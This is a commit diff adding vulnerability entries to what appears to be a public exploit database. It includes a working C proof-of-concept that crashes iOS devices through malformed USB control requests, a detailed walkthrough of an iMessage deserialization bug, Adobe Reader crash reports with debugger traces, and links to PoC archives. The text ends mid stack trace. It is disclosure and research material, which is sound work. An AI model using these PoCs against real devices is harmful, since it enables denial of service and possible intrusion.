DB: 2019-11-12
8 changes to exploits/shellcodes iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC) iMessage - Decoding NSSharedKeyDictionary can read ObjC Object at Attacker Controlled Address Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed JBIG2Globals Stream Adobe Acrobat Reader DC for Windows - Use of Uninitialized Pointer due to Malformed OTF Font (CFF Table) _GCafé 3.0 - 'gbClienService' Unquoted Service Path Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path XML Notepad 2.8.0.4 - XML External Entity Injection
This commit is contained in:
parent
b6ed2c7176
commit
7e9d444235
9 changed files with 623 additions and 1 deletions
209
exploits/ios/dos/47607.c
Normal file
209
exploits/ios/dos/47607.c
Normal file
|
@ -0,0 +1,209 @@
|
|||
# Exploit Title: iOS IOUSBDeviceFamily 12.4.1 - 'IOInterruptEventSource' Heap Corruption (PoC)
|
||||
# Date: 2019-10-29
|
||||
# Exploit Author: Sem Voigtlander, Joshua Hill and Raz Mashat
|
||||
# Vendor Homepage: https://apple.com/
|
||||
# Software Link: https://support.apple.com/en-hk/HT210606
|
||||
# Version: iOS 13
|
||||
# Tested on: iOS 12.4.1
|
||||
# CVE : N/A
|
||||
|
||||
# A vulnerable implementation of IOInterruptEventSource on a workloop exists in IOUSBDeviceFamily.
|
||||
# The code can be triggered by a local attacker by sending a malicious USB control request to device.
|
||||
# It seems the faulting address register is corrupted as result of a heap corruption vulnerability.
|
||||
# However, on earlier iOS versions (tested on 12.0.1) we were able to trigger a use after free in reserved->statistics relating to the same vulnerable code too.
|
||||
# This bug was found through statically analyzing xnu from public source and optimized USB fuzzing.
|
||||
# A proof of concept written in C for macOS is attached, for other platforms python and c code using libusb exists on GitHub (https://github.com/userlandkernel/USBusted)
|
||||
|
||||
iousbusted.c
|
||||
|
||||
/*
|
||||
Pure IOKit implementation of CVE-2019-8718
|
||||
Written by Sem Voigtländer.
|
||||
Compile: clang iousbusted.c -o iousbusted -framework IOKit -framework CoreFoundation
|
||||
Tip: You can also use this for projects like checkm8 autopwn etc.
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <mach/mach.h>
|
||||
#include <IOKit/usb/IOUSBLib.h>
|
||||
#include <IOKit/IOCFPlugIn.h>
|
||||
#include <CoreFoundation/CoreFoundation.h>
|
||||
|
||||
/* Faster comparissions for 64-bit integers than != and == */
|
||||
#define FCOMP(P1,P2) !(P1 ^ P2)
|
||||
|
||||
const char *defaultMsg = "HELLO WORLD";
|
||||
|
||||
/* Method for sending an USB control message to a target device */
|
||||
static int send_usb_msg(IOUSBDeviceInterface** dev, int type, int reqno, int val, int idx, const char *msg)
|
||||
{
|
||||
|
||||
if(!dev){
|
||||
printf("No device handle given.\n");
|
||||
return KERN_FAILURE;
|
||||
}
|
||||
|
||||
if(!msg)
|
||||
msg = defaultMsg;
|
||||
|
||||
IOUSBDevRequest req;
|
||||
req.bmRequestType = type;
|
||||
req.bRequest = reqno;
|
||||
req.wValue = val;
|
||||
req.wIndex = idx;
|
||||
req.wLength = strlen(msg);
|
||||
req.pData = msg;
|
||||
req.wLenDone = 0;
|
||||
IOReturn rc = KERN_SUCCESS;
|
||||
|
||||
rc = (*dev)->DeviceRequest(dev, &req);
|
||||
|
||||
if(rc != KERN_SUCCESS)
|
||||
{
|
||||
return rc;
|
||||
}
|
||||
|
||||
return KERN_SUCCESS;
|
||||
}
|
||||
|
||||
static int send_usbusted_pwn_msg(IOUSBDeviceInterface** dev, const char *msg)
|
||||
{
|
||||
|
||||
if(!dev){
|
||||
printf("No device handle given.\n");
|
||||
return KERN_FAILURE;
|
||||
}
|
||||
|
||||
kern_return_t rc = send_usb_msg(dev, 0|0x80, 0x6, 0x30c, 0x409, msg);
|
||||
|
||||
if(rc != kIOReturnSuccess)
|
||||
{
|
||||
return rc;
|
||||
}
|
||||
|
||||
return KERN_SUCCESS;
|
||||
}
|
||||
|
||||
/* Print information from an IOKit USB device */
|
||||
static int print_usb_device(io_service_t device){
|
||||
|
||||
kern_return_t err = KERN_SUCCESS;
|
||||
|
||||
CFNumberRef vid = 0;
|
||||
CFNumberRef pid = 0;
|
||||
CFNumberRef locationID = 0;
|
||||
|
||||
CFMutableDictionaryRef p = NULL;
|
||||
err = IORegistryEntryCreateCFProperties(device, &p, NULL, 0);
|
||||
|
||||
if(err != KERN_SUCCESS || !p)
|
||||
return err;
|
||||
|
||||
if(!CFDictionaryGetValueIfPresent(p, CFSTR("idVendor"), &vid))
|
||||
return KERN_FAILURE;
|
||||
|
||||
if(!CFDictionaryGetValueIfPresent(p, CFSTR("idProduct"), &pid))
|
||||
return KERN_FAILURE;
|
||||
|
||||
CFDictionaryGetValueIfPresent(p, CFSTR("locationID"), &locationID);
|
||||
|
||||
CFNumberGetValue(vid, kCFNumberSInt32Type, &vid);
|
||||
CFNumberGetValue(pid, kCFNumberSInt32Type, &pid); // <-- yes I know this is dirty, I was tired.
|
||||
|
||||
if(locationID)
|
||||
CFNumberGetValue(locationID, kCFNumberSInt32Type, &locationID);
|
||||
|
||||
printf("Got device %#x @ %#x (%#x:%#x)\n", device, locationID, vid, pid);
|
||||
return err;
|
||||
}
|
||||
|
||||
/* Get a handle for sending to a device */
|
||||
static int get_usbdevice_handle(io_service_t device, IOUSBDeviceInterface* dev){
|
||||
|
||||
kern_return_t err = KERN_SUCCESS;
|
||||
SInt32 score;
|
||||
IOCFPlugInInterface** plugInInterface = NULL;
|
||||
|
||||
err = IOCreatePlugInInterfaceForService(device,
|
||||
kIOUSBDeviceUserClientTypeID,
|
||||
kIOCFPlugInInterfaceID,
|
||||
&plugInInterface, &score);
|
||||
|
||||
if (err != KERN_SUCCESS || plugInInterface == NULL)
|
||||
return err;
|
||||
|
||||
err = (*plugInInterface)->QueryInterface(plugInInterface, CFUUIDGetUUIDBytes(kIOUSBDeviceInterfaceID), (LPVOID*)dev);
|
||||
|
||||
if(err != kIOReturnSuccess)
|
||||
return err;
|
||||
|
||||
// Now done with the plugin interface.
|
||||
(*plugInInterface)->Release(plugInInterface);
|
||||
//plugInInterface = NULL;
|
||||
|
||||
if(!dev)
|
||||
return KERN_FAILURE;
|
||||
|
||||
return err;
|
||||
}
|
||||
|
||||
/* Iterate over all USB devices */
|
||||
static int iterate_usb_devices(const char *msg){
|
||||
CFMutableDictionaryRef matchingDict;
|
||||
io_iterator_t iter;
|
||||
kern_return_t kr;
|
||||
io_service_t device;
|
||||
|
||||
/* set up a matching dictionary for the class */
|
||||
matchingDict = IOServiceMatching(kIOUSBDeviceClassName);
|
||||
if (matchingDict == NULL)
|
||||
{
|
||||
return -1; // fail
|
||||
}
|
||||
|
||||
/* Now we have a dictionary, get an iterator.*/
|
||||
kr = IOServiceGetMatchingServices(kIOMasterPortDefault, matchingDict, &iter);
|
||||
if (kr != KERN_SUCCESS)
|
||||
{
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* iterate */
|
||||
while ((device = IOIteratorNext(iter)))
|
||||
{
|
||||
/* do something with device, eg. check properties */
|
||||
kr = print_usb_device(device);
|
||||
|
||||
if(kr != KERN_SUCCESS){
|
||||
printf("Skipping device as it has no vid / pid.\n");
|
||||
continue;
|
||||
}
|
||||
|
||||
IOUSBDeviceInterface **dev = 0;
|
||||
kr = get_usbdevice_handle(device, &dev);
|
||||
|
||||
if(kr != KERN_SUCCESS){
|
||||
printf("Skipping device as no handle for it could be retrieved.\n");
|
||||
continue;
|
||||
}
|
||||
|
||||
kr = send_usbusted_pwn_msg(dev, msg);
|
||||
printf("RET: %s\n\n", mach_error_string(kr));
|
||||
|
||||
/* And free the reference taken before continuing to the next item */
|
||||
IOObjectRelease(device);
|
||||
}
|
||||
|
||||
/* Done, release the iterator */
|
||||
IOObjectRelease(iter);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]){
|
||||
char payload[108];
|
||||
memset(&payload, 'A', 108);
|
||||
int err = iterate_usb_devices(payload);
|
||||
return err;
|
||||
}
|
94
exploits/multiple/dos/47608.txt
Normal file
94
exploits/multiple/dos/47608.txt
Normal file
|
@ -0,0 +1,94 @@
|
|||
During processing of incoming iMessages, attacker controlled data is deserialized using the
|
||||
NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is
|
||||
NSDictionary. However, due to the logic of NSUnarchiver, all subclasses of NSDictionary that also
|
||||
implement secure coding can then be deserialized as well. NSSharedKeyDictionary is an example of
|
||||
such a subclass. A NSSharedKeyDictionary is a dictionary for which, for performance reasons, the
|
||||
keys are predefined using a NSSharedKeySet.
|
||||
|
||||
A NSSharedKeyDictionary is essentially a linear array of values and a pointer to its
|
||||
NSSharedKeySet. An NSSharedKeySet on the other hand looks roughly like this (with some fields
|
||||
omitted for simplicity and translated to pseudo-C):
|
||||
|
||||
struct NSSharedKeySet {
|
||||
unsigned int _numKeys; // The number of keys in the _keys array
|
||||
id* _keys; // A pointer to an array containing the key values
|
||||
unsigned int _rankTable; // A table basically mapping the hashes of
|
||||
// the keys to an index into _keys
|
||||
unsigned int _M; // The size of the _rankTable
|
||||
unsigned int _factor; // Used to compute the index into _rankTable from a hash.
|
||||
NSSharedKeySet* _subKeySet; // The next KeySet in the chain
|
||||
};
|
||||
|
||||
The value lookup on an NSSharedKeyDictionary then works roughly as follows:
|
||||
* NSSharedKeyDictionary invokes [NSSharedKeySet indexForKey:] on its associated keySet
|
||||
* indexForKey: computes the hash of the key, basically computes rti = hash % _factor, bounds-checks
|
||||
that against _M, and finally uses it to lookup the index in its rankTable: idx = _rankTable[rti]
|
||||
* It verifies that idx < _numKeys
|
||||
* It loads _keys[idx] and invokes [key isEqual:candidate] with it as argument
|
||||
* If the result is true, the index has been found and is returned to the NSSharedKeyDictionary where
|
||||
it is used to index into its values array
|
||||
* If not, indexForKey: recursively processes the subKeySet in the same way until it either finds the
|
||||
key or there is no subKeySet left, in which case it returns -1
|
||||
|
||||
The NSArchiver format is powerful enough to allow reference cycles between decoded objects.
|
||||
This now enables the following attack:
|
||||
|
||||
SharedKeyDictionary1 --[ keySet ]-> SharedKeySet1 --[ subKeySet ]-> SharedKeySet2 --+
|
||||
^ |
|
||||
| [ subKeySet ]
|
||||
| |
|
||||
+-----------------------------------------+
|
||||
|
||||
What will happen now is the following:
|
||||
|
||||
* The SharedKeyDictionary1 is decoded and its initWithCoder: executed
|
||||
* [NSSharedKeyDictionary initWithCoder:] decodes its _keySet, which is SharedKeySet1
|
||||
* The [NSSharedKeySet initWithCoder:] for SharedKeyDictionary1 reads and initializes the following fields:
|
||||
* _numKeys, which at this point is unchecked and can be any unsigned integer value.
|
||||
Only later will it be checked to be equal to the number of keys in the _keys array.
|
||||
* _rankTable, with completely attacker controlled content
|
||||
* _M, which must be equal to the size of the _rankTable
|
||||
* _factor, which must be a prime but otherwise can be arbitrarily chosen
|
||||
At this point, _numKeys = 0xffffffff but _keys is still nullptr (because ObjC objects are
|
||||
allocated with calloc)
|
||||
* Next, *before* initializing _keys, it deserializes the _subKeySet, SharedKeySet2
|
||||
* [NSSharedKeySet initWithCoder:] of SharedKeySet2 finishes, and at the end verifies that
|
||||
it is a valid SharedKeySet. It does that by checking that all its keys correctly map to an index.
|
||||
For that it calls [NSSharedKeySet indexForKey:] on itself for every key.
|
||||
* (At least) one of the keys will, however, not be found on SharedKeySet2. As such,
|
||||
indexForKey: will proceed to search for the key in its _subKeySet, which is actually SharedKeySet1
|
||||
* The lookup proceeds and determines that the index should be (in our case) 2189591170, which is
|
||||
less than SharedKeySet1->numKey (which is still 0xffffffff)
|
||||
* It then loads SharedKeySet1->keys[2189591170], which, as ->_keys is still nullptr, reads an
|
||||
objc_object* from 0x414141410 and thus crashes
|
||||
|
||||
The attached PoC demonstrates this on the latest macOS 10.14.6
|
||||
|
||||
> clang -o tester tester.m -framework Foundation
|
||||
> ./generator.py
|
||||
> lldb -- ./tester payload.xml
|
||||
(lldb) target create "./tester"
|
||||
Current executable set to './tester' (x86_64).
|
||||
(lldb) settings set -- target.run-args "payload.xml"
|
||||
(lldb) r
|
||||
2019-07-29 15:40:28.989305+0200 tester[71168:496831] Let's go
|
||||
Process 71168 stopped
|
||||
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141410)
|
||||
frame #0: 0x00007fff3390d3e7 CoreFoundation`-[NSSharedKeySet indexForKey:] + 566
|
||||
CoreFoundation`-[NSSharedKeySet indexForKey:]:
|
||||
-> 0x7fff3390d3e7 <+566>: mov rdx, qword ptr [rax + 8*r13]
|
||||
|
||||
|
||||
Combined with a heap spray, this bug could likely be remotely exploitable.
|
||||
|
||||
Ideally, this issue and similar ones can be prevented by removing the NSSharedKeyDictionary attack
|
||||
surface completely, as originally suggested by Natalie. Alternatively, I think another solution
|
||||
might be to stop encoding all the internal fields of the NSSharedKeyDictionary/NSSharedKeySet
|
||||
(rankTable, numKeys, especially the subKeySet, ...) and only encode the keys and values. The new
|
||||
[initWithCoder:] implementations could then just call +[NSSharedKeySet keySetWithKeys:] and
|
||||
+[NSSharedKeyDictionary sharedKeyDictionaryWithKeySet:] to construct new instances with the decoded
|
||||
keys and values. This should be fine as all the other fields are implementation details anyway.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47608.zip
|
81
exploits/windows/dos/47609.txt
Normal file
81
exploits/windows/dos/47609.txt
Normal file
|
@ -0,0 +1,81 @@
|
|||
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
|
||||
|
||||
--- cut ---
|
||||
(88e4.30f4): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=00000001 ebx=0478be34 ecx=00000000 edx=c0c0c0c0 esi=00000000 edi=00000000
|
||||
eip=5fdc2341 esp=0478bd24 ebp=0478bd54 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
|
||||
AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1:
|
||||
5fdc2341 8a4a04 mov cl,byte ptr [edx+4] ds:002b:c0c0c0c4=??
|
||||
|
||||
0:000> kb
|
||||
# ChildEBP RetAddr Args to Child
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
00 0478bd54 5fdb1157 0478be48 ceb1c57a 68754f88 AcroRd32!CTJPEGTiledContentWriter::operator=+0x147e1
|
||||
01 0478bea0 5fdafd04 68754f88 00000002 687fefe8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x35f7
|
||||
02 0478bed8 5fda234f 5f198f54 5f198f54 68504fb8 AcroRd32!CTJPEGTiledContentWriter::operator=+0x21a4
|
||||
03 0478beec 5fd95227 68504fb8 00000044 684fcf40 AcroRd32!AX_PDXlateToHostEx+0x34468f
|
||||
04 0478bfa0 5f795889 5f198f54 590b4fb0 5f7957f0 AcroRd32!AX_PDXlateToHostEx+0x337567
|
||||
05 0478bfc4 5f795783 4d346ff8 00000001 00000001 AcroRd32!DllCanUnloadNow+0x4c929
|
||||
06 0478bfe4 5fbe1d7a 0478c008 4d346ff8 00000001 AcroRd32!DllCanUnloadNow+0x4c823
|
||||
07 0478c028 5f8cafc8 c0020000 00000001 4d346ff8 AcroRd32!AX_PDXlateToHostEx+0x1840ba
|
||||
08 0478c37c 5f8ca506 0478c3d8 7492ea98 ceb1b86e AcroRd32!DllCanUnloadNow+0x182068
|
||||
09 0478c3b4 5f8ca3e1 0478c3d8 7492ea98 0478c444 AcroRd32!DllCanUnloadNow+0x1815a6
|
||||
0a 0478c420 5f8c93a8 c0020000 00000001 7492ea98 AcroRd32!DllCanUnloadNow+0x181481
|
||||
0b 0478c880 5f8c68f7 0478cb84 6856c5ac c0020000 AcroRd32!DllCanUnloadNow+0x180448
|
||||
0c 0478e060 5f8c6575 6856c5ac c0020000 00000001 AcroRd32!DllCanUnloadNow+0x17d997
|
||||
0d 0478e130 5f8aa25c ceb199ca 45e6ef78 00000000 AcroRd32!DllCanUnloadNow+0x17d615
|
||||
0e 0478e210 5f8a9057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc
|
||||
0f 0478e25c 5f89c183 45e6ef78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7
|
||||
10 0478e3d0 5f89ba97 67fccdbc 00000001 5ef9cef8 AcroRd32!DllCanUnloadNow+0x153223
|
||||
11 0478e438 5f899281 ceb19f62 6fca6fc8 823c2ea8 AcroRd32!DllCanUnloadNow+0x152b37
|
||||
12 0478e4b8 5f898dae 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x150321
|
||||
13 0478e4f4 5f898d07 5ef9cef8 5d9eaf40 823c2eb8 AcroRd32!DllCanUnloadNow+0x14fe4e
|
||||
14 0478e57c 5f8982ee 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14fda7
|
||||
15 0478e5b8 5f896f02 5ef9cef8 5d9eaf40 0478e7b0 AcroRd32!DllCanUnloadNow+0x14f38e
|
||||
16 0478e87c 5f895d98 5ef9cef8 0478e910 0478e960 AcroRd32!DllCanUnloadNow+0x14dfa2
|
||||
17 0478e980 5f895175 5ef9cef8 0478eab0 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
|
||||
18 0478ead4 5f8942ba 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14c215
|
||||
19 0478eb34 5f89414d 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
|
||||
1a 0478eb54 5f892d3c 5ef9cef8 0478ebd8 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
|
||||
1b 0478ec0c 5f892762 00000001 00000000 ceb197be AcroRd32!DllCanUnloadNow+0x149ddc
|
||||
1c 0478ec64 5f89257a 3f3fcef0 00000001 ceb19712 AcroRd32!DllCanUnloadNow+0x149802
|
||||
1d 0478ecc8 5f8922ff 0478edbc ceb19606 8355afa0 AcroRd32!DllCanUnloadNow+0x14961a
|
||||
1e 0478eddc 5f75687c 8355afa0 5f7567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
|
||||
1f 0478edf4 5f75678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
|
||||
20 0478ee10 745de0bb 02a20faa 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
|
||||
21 0478ee3c 745e8849 5f7566d0 02a20faa 0000000f USER32!_InternalCallWinProc+0x2b
|
||||
22 0478ee60 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
|
||||
23 0478ef30 745d8503 5f7566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
|
||||
24 0478ef98 745d8aa0 13f2abb0 00000000 0000000f USER32!DispatchClientMessage+0x1b3
|
||||
25 0478efe0 77371a6d 0478effc 00000020 0478f05c USER32!__fnDWORD+0x50
|
||||
26 0478f018 745d91ee 0478f0ac ce1677b9 18068dd8 ntdll!KiUserCallbackDispatcher+0x4d
|
||||
27 0478f06c 745d8c20 ca6e87d5 0478f090 5f76da6d USER32!DispatchMessageWorker+0x5be
|
||||
28 0478f078 5f76da6d 0478f0ac 18068dd8 18068dd8 USER32!DispatchMessageW+0x10
|
||||
29 0478f090 5f76d89e 0478f0ac ceb18ade 18068dd8 AcroRd32!DllCanUnloadNow+0x24b0d
|
||||
2a 0478f104 5f76d744 ceb18ae6 18068dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e
|
||||
2b 0478f13c 5f6fc575 ceb18a76 16cb6ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4
|
||||
2c 0478f1ac 5f6fbf81 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x775
|
||||
2d 0478f5cc 0011783d 5f6d0000 00110000 16cb6ff8 AcroRd32!AcroWinMainSandbox+0x181
|
||||
2e 0478f998 002201aa 00110000 00000000 0b48b3f2 AcroRd32_exe+0x783d
|
||||
2f 0478f9e4 76698674 04504000 76698650 1f7eb52b AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da
|
||||
30 0478f9f8 77365e17 04504000 fdd62153 00000000 KERNEL32!BaseThreadInitThunk+0x24
|
||||
31 0478fa40 77365de7 ffffffff 7738adab 00000000 ntdll!__RtlUserThreadStart+0x2f
|
||||
32 0478fa50 00000000 00111390 04504000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
||||
--- cut ---
|
||||
|
||||
Notes:
|
||||
|
||||
- Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes).
|
||||
|
||||
- The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above.
|
||||
|
||||
- Attached samples: poc.pdf (crashing file), original.pdf (original file).
|
||||
|
||||
- We have minimized the difference between the original and mutated files down to a single byte at offset 0x2f5, which appears to reside inside a JBIG2Globals object. It was modified from 0x00 to 0x35.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47609.zip
|
142
exploits/windows/dos/47610.txt
Normal file
142
exploits/windows/dos/47610.txt
Normal file
|
@ -0,0 +1,142 @@
|
|||
We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
|
||||
|
||||
--- cut ---
|
||||
(5708.4564): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=c0c0c0c0 ebx=00000000 ecx=6826e380 edx=00000000 esi=00000002 edi=00000006
|
||||
eip=15e440e8 esp=047fc158 ebp=047fc1b8 iopl=0 nv up ei ng nz ac po cy
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210293
|
||||
CoolType!CTCleanup+0x25be8:
|
||||
15e440e8 f6403860 test byte ptr [eax+38h],60h ds:002b:c0c0c0f8=??
|
||||
|
||||
0:000> u @$scopeip-9
|
||||
CoolType!CTCleanup+0x25bdf:
|
||||
15e440df 8b4d08 mov ecx,dword ptr [ebp+8]
|
||||
15e440e2 8b7dc4 mov edi,dword ptr [ebp-3Ch]
|
||||
15e440e5 8b0481 mov eax,dword ptr [ecx+eax*4]
|
||||
15e440e8 f6403860 test byte ptr [eax+38h],60h
|
||||
15e440ec 0f851f010000 jne CoolType!CTCleanup+0x25d11 (15e44211)
|
||||
15e440f2 0fb7781a movzx edi,word ptr [eax+1Ah]
|
||||
15e440f6 0fb7401e movzx eax,word ptr [eax+1Eh]
|
||||
15e440fa 8bc8 mov ecx,eax
|
||||
|
||||
0:000> dd ecx
|
||||
6826e380 16063e80 16063e40 1605fd00 c0c0c0c0
|
||||
6826e390 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
6826e3a0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
6826e3b0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
6826e3c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
6826e3d0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
6826e3e0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
6826e3f0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
|
||||
|
||||
0:000> kb
|
||||
# ChildEBP RetAddr Args to Child
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
00 047fc1b8 15e434ea 6826e380 1605fce0 6826e388 CoolType!CTCleanup+0x25be8
|
||||
01 047fc1d4 15e43f02 6826e380 1605fd00 6826e388 CoolType!CTCleanup+0x24fea
|
||||
02 047fc1fc 15e4edc1 6936cff0 16063e40 1605fd00 CoolType!CTCleanup+0x25a02
|
||||
03 047fc230 15deb53d 6936cbf0 047fcca4 00000f5c CoolType!CTCleanup+0x308c1
|
||||
04 047fc94c 15de6251 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x483dd
|
||||
05 047fca30 15e223fa 6936cbf0 047fcbdc 047fcd5c CoolType!CTInit+0x430f1
|
||||
06 047fcb88 15e220be 6936cbf0 047fcd5c 047fcd2c CoolType!CTCleanup+0x3efa
|
||||
07 047fcc04 15df972d 6936cbf0 16067080 047fcd5c CoolType!CTCleanup+0x3bbe
|
||||
08 047fcdcc 15df8f00 047fcfc0 00000000 16067330 CoolType!CTInit+0x565cd
|
||||
09 047fce9c 15df7d87 0b601000 00000001 00000001 CoolType!CTInit+0x55da0
|
||||
0a 047fd268 15df7414 0000012c 86c0e9cc 00001aba CoolType!CTInit+0x54c27
|
||||
0b 047fd2ac 15df63de 86c0e9c0 00000064 047fd344 CoolType!CTInit+0x542b4
|
||||
0c 047fd41c 15df5eb9 047fd834 047fdbb0 0000044a CoolType!CTInit+0x5327e
|
||||
0d 047fd470 16112a42 3ede4e60 047fd834 047fdbb0 CoolType!CTInit+0x52d59
|
||||
0e 047fd7b8 16111888 8ec19b64 047fd834 047fdbb0 AGM!AGMInitialize+0x69bd2
|
||||
0f 047fd918 160dc460 047fd980 8ec19b00 047fdc48 AGM!AGMInitialize+0x68a18
|
||||
10 047fd9b4 160e469a 047fdb98 8ec19b00 047fdc48 AGM!AGMInitialize+0x335f0
|
||||
11 047fdbe0 160e2ae0 3eb84ba0 67b69f70 8ec19b00 AGM!AGMInitialize+0x3b82a
|
||||
12 047fddbc 160e186c 3eb84ba0 67b69f70 56375db9 AGM!AGMInitialize+0x39c70
|
||||
13 047fde08 161107ff 3eb84ba0 67b69f70 68a8ad50 AGM!AGMInitialize+0x389fc
|
||||
14 047fde2c 1611030e 00000301 1611044f 67b69f70 AGM!AGMInitialize+0x6798f
|
||||
15 047fde34 1611044f 67b69f70 56375d11 68a8ad50 AGM!AGMInitialize+0x6749e
|
||||
16 047fde6c 160b945b 047fdf40 1610f910 00000000 AGM!AGMInitialize+0x675df
|
||||
17 047fdec0 5fdcd4ad 047fde00 5fdcd4b4 dd9e27c4 AGM!AGMInitialize+0x105eb
|
||||
18 047fdec8 5fdcd4b4 dd9e27c4 68a8ad50 047fdeac AcroRd32!DllCanUnloadNow+0x18454d
|
||||
19 047fdee8 5fddb77d 3ede4f64 7cb8ed90 047fdf00 AcroRd32!DllCanUnloadNow+0x184554
|
||||
1a 047fdf04 5fddb274 553c0f84 dd9e2644 553c0f58 AcroRd32!DllCanUnloadNow+0x19281d
|
||||
1b 047fdf6c 5fdeef36 dd9e2698 00000000 553c0f58 AcroRd32!DllCanUnloadNow+0x192314
|
||||
1c 047fdfb0 5fddaa40 dd9e26d4 5e4a0f78 553c0f58 AcroRd32!CTJPEGDecoderRelease+0x3426
|
||||
1d 047fdffc 5fdda902 dd9e196c 5e4a0f78 047fe0ec AcroRd32!DllCanUnloadNow+0x191ae0
|
||||
1e 047fe044 5fdda7e3 047fe060 dd9e1998 047fe41c AcroRd32!DllCanUnloadNow+0x1919a2
|
||||
1f 047fe0b0 5fdda677 047fe0ec 8ef46ff0 3fe7bc80 AcroRd32!DllCanUnloadNow+0x191883
|
||||
20 047fe110 5fdd8aed 8ef46ff0 5fddbc70 047fe41c AcroRd32!DllCanUnloadNow+0x191717
|
||||
21 047fe210 5fdd8542 047fe41c dd9e1b74 1a74ed88 AcroRd32!DllCanUnloadNow+0x18fb8d
|
||||
22 047fe25c 5fdd79dd 047fe41c 047fe424 dd9e1df0 AcroRd32!DllCanUnloadNow+0x18f5e2
|
||||
23 047fe4d8 5fdd77ee 00000002 81ffa4e2 dd9e1c1c AcroRd32!DllCanUnloadNow+0x18ea7d
|
||||
24 047fe534 5fd9706a 00000002 81ffa4e2 dd9e1ec4 AcroRd32!DllCanUnloadNow+0x18e88e
|
||||
25 047fe7ec 5fd95d98 5ee78ef8 047fe880 047fe8d0 AcroRd32!DllCanUnloadNow+0x14e10a
|
||||
26 047fe8f0 5fd95175 5ee78ef8 047fea20 00000000 AcroRd32!DllCanUnloadNow+0x14ce38
|
||||
27 047fea44 5fd942ba 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14c215
|
||||
28 047feaa4 5fd9414d 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b35a
|
||||
29 047feac4 5fd92d3c 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed
|
||||
2a 047feb7c 5fd92762 00000001 00000000 dd9e12fc AcroRd32!DllCanUnloadNow+0x149ddc
|
||||
2b 047febd4 5fd9257a 7313eef0 00000001 dd9e1510 AcroRd32!DllCanUnloadNow+0x149802
|
||||
2c 047fec38 5fd922ff 047fed2c dd9e1464 81ff8fa0 AcroRd32!DllCanUnloadNow+0x14961a
|
||||
2d 047fed4c 5fc5687c 81ff8fa0 5fc567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f
|
||||
2e 047fed64 5fc5678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c
|
||||
2f 047fed80 745de0bb 03870c42 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f
|
||||
30 047fedac 745e8849 5fc566d0 03870c42 0000000f USER32!_InternalCallWinProc+0x2b
|
||||
31 047fedd0 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
|
||||
